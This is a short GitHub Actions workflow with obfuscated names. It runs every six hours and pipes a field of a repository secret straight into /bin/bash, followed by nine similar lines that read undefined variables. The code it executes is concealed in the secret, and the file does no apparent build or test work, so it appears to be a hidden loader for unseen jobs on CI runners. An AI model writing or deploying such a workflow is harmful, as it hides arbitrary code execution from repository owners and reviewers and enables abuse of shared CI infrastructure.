name: rencunxxk

on:
  workflow_dispatch:
  schedule:
    - cron: '41 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: rencunxxk
        env:
          lljvu04028: ${{ secrets.lljvu04028 }}
        run: |
          echo $lljvu04028 | jq -r .k970 | /bin/bash
          echo $bet34 | jq -r .ylkfq009 | /bin/bash
          echo $crfqj308 | jq -r .sakg116 | /bin/bash
          echo $gavj68 | jq -r .rio60 | /bin/bash
          echo $lr0973 | jq -r .xl066 | /bin/bash
          echo $a553 | jq -r .llqc2 | /bin/bash
          echo $v6268 | jq -r .hndey52785 | /bin/bash
          echo $un67510 | jq -r .u66 | /bin/bash
          echo $jxgdf2542 | jq -r .oo434 | /bin/bash
          echo $syd58482 | jq -r .luhz368 | /bin/bash

